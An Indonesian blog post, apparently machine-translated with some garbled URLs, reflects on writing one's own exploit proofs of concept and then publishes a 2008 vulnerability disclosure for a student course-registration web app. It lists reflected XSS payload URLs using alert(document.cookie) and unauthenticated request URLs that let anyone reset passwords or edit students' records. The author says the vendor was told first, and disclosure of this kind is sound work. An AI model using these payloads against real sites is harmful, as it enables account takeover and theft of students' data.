BUKTI KONSEP (POC)

Bukti Konsep, atau yang sering diucapkan dengan singkatan PoC merupakan sinopsis dari suatu metode / cara yang biasanya untuk memberikan bukti yang dapat mengeksploitasi sistem. PoC yang lengkap (yang bikin rajin) biasanya membahasa bug yang mereka temukan secara terperinci, dan menjelaskan yang sangat baik. Mereka biasanya memberikan potongan kode program yang ada pada sistem tersebut, dan memberikan solusi dari bug tersebut. PoC dapat dengan mudah ditemui pada keamanan website2besar seperti milw0rmpacketstormsecurity , securityfocus, juga situs web2 komunitas lainnya. Ada berbagai macam cara penyajian PoC Ada yang cuman ngasih cara untuk mengeksploitasinya, ada yang pake di bahas dulu, ada juga yang sudah dibuat menjadi program untuk pembuktiaan .. sumber c ++, python atau perl. Beberapa PoC ada yang menerbitkan setelah melakukan koordinasi terlebih dahulu dengan vendor sistemnya, sehingga dari vendor dapat mengeluarkan pembaruan dari sistem mereka, sedangkan ada juga yang utama langsung di publish! Itulah kenyataan, merupakan suatu keharusan dari seorang administrator untuk selalu memperbarui terhadap masalah sistem keamanan. Yang ingin gw berbagi di sini adalah, kebanyakan dari kenalan saya di dunia maya .. banyak sekali yang mengandalkan PoC terbaru untuk melakukan peretasan, saya akui dulu saya juga suka ini. Namun gw coba berpikir, mengapa peretasan harus bergantung pada orang lain? Bukankah lebih mengasyikan jika kita dapat membuat PoC sendiri, dengan melakukan analisa terhadap suatu sistem. Akhirnya, gunakan PoC di website2 Unggul itu menjadi sedikit bergeser di mata saya. Saya lebih suka menggunakan bahan bacaan. Mereka biasanya memberikan sedikit gambaran dari bug tersebut, sehingga saya bisa menganalisanya. Bagaimana? Saya mencoba mencari sistem yang rentan, saya menginstal di komputer sendiri rumah saya, dan saya mencoba terapkan konsep yang diberikan oleh penulisnya. Menurut saya, ini lebih bermanfaat bagi saya! Saya dapat memperhatikan proses eksploitasi yang terjadi, saya dapat melakukan simulasi, dan akhirnya saya mendapatkan sesuatu yang berharga, yaitu 'ilmu'. Ada seorang teman saya yang mengatakan, ini adalah fase proses keluar dari skrip kiddies, tapi saya katakan kalo saya masih seorang pemula yang pengen belajar saja  Bagi pemula seperti saya ini, merupakan sebuah kebanggan yang didukung agar dapat menghasilkan sebuah PoC. Setelah perjuangan lama, akhirnya saya memiliki PoC pertama saya, semoga bukan yang terakhir Meskipun teknik yang digunakan hanya tingkat pemula, tapi nyatanya bisa di eksploitasi! Semoga bisa sebagai bahan pembelajaran, saya publikasikan di blog saya ini juga setelah jauh hari sebelumnya saya sudah melapor kepada pihak vendornya, meskipun mungkin orang lain tidak tahu sistem apa yang saya eksploit, dan tidak berguna secara langsung .. dari awal saya buat blog ini , mengerjakan catatan kecil saya, dan juga sebagai manajemen pengetahuan pribadi saya. Semoga pihak vendor dapat melakukan pembaruan secara keseluruhan.


############################################### ############# 


Aplikasi 
Eksploitasi 

: Skrip: SiaP! KRS Online oleh TSM Labs 
Dilaporkan: 8 Mei 2008 
Diterbitkan: 13 Mei 2008 

################################## ############################ 

Bukti Konsep 
(PoC) 

############ ###############################################
------------------------------------------------ ---------------- 
Jenis: Beberapa Kerentanan XSS 
----------------------------- ----------------------------------- 

1: Rentan: http: // [situs] /sylabus.php ? mk = waspada (document.cookie) 
PoC: http://192.168.20.253/sylabus.php?mk=alert(document.cookie)
Status: [Tidak Ditambal | Anonim | Level Ancaman: Rendah] 


2: Rentan: http: // [situs] /absensi.php?op=StatusUAS&nim=alert (document.cookie) 
PoC: http://192.168.20.253/absensi.php?op=StatusUAS&nim=alert (document.cookie) 
Status: [Tidak Ditambal | Diperlukan Login | Level Ancaman: Rendah] 

3: Vulerable: http: // [situs] /phpinfo.php?GLOBALS [test] = alert (document.cookie); 
PoC: http://192.168.20.253/phpinfo.php?GLOBALS[test[=alert(document.cookie); 
[Tidak Ditambal | Anonim | Level Ancaman: Rendah] 

########################################### ################### 
------------------------------- --------------------------------- 
Jenis: Modul Sesi Tidak Diauthentikasi
-------------------------------------------------- -------------- 

1: Rentan: http: // [situs] /password.php 
PoC: http://192.168.20.253/password.php 
Status: [Ditambal | Anonim | Level Ancaman: TINGGI | Catatan: Dapat mengganti kata sandi semua pengguna tanpa login sama sekali!] 

2: Rentan: http: // [situs] /krs.php?op=pilih&isi= [Nama Periode] & kode = [Kode Perdiode] & kode_mhs = [NIM] 
PoC: http://192.168.20.253/krs.php?op=pilih&isi=Semester%20Pendek,%20Tahun%20Ajaran%202007-2008&kode=07P&kode_mhs=206000001 
Status: [Ditambal | Anonim | Level Ancaman: TINGGI | Catatan: Dapat mengisi & mengedit KRS semua pengguna tanpa login sama sekali!] 

3: Rentan: http: // [situs] /front_mhs.php?nim= [NIM]
PoC: http://192.168.20.253/front_mhs.php?nim=206000001 
Status: [Tidak Ditambal | Diperlukan Login | Level Ancaman: Rendah] 

4: Rentan: http: // [situs] /absensi.php?op=StatusUAS&nim= [NIM] 
PoC: http://192.168.20.253/absensi.php?op=StatusUAS&nim=206000001 
Status: [ Tidak Ditambal | Diperlukan Login | Level Ancaman: Rendah] 

5: Rentan: http://192.168.20.253/whata.php?nim=[NIM] 
PoC: http://192.168.20.253/whata.php?nim=206000001 
Status: [Tidak Ditambal | Anonim | Level Ancaman: Rendah | Catatan: Pilihan buat periode mana yang dicetak, semua pengguna = P] 

6: Rentan: http://192.168.20.253/print.khslengkap.php?nim=[NIM] 
PoC: http://192.168.20.253/print. khslengkap.php? nim = 206000001
Status: [Tidak Ditambal | Anonim | Level Ancaman: Rendah] 


7: Rentan: http://192.168.20.253/print.transkrip.php?nim=[NIM] 
PoC: http://192.168.20.253/print.transkrip.php?nim=206000001 
Status: [ Tidak Ditambal | Anonim | Level Ancaman: Rendah] 

Catatan: Vendor terlalu percaya dengan pengguna input, mengubah variabel penting semacam $ nim pada permintaan dengan menggunakan variabel Sesi. 
-------------------------------------------------- -------------- 
################################## ######### 


Terima kasih

Komentar

Postingan Populer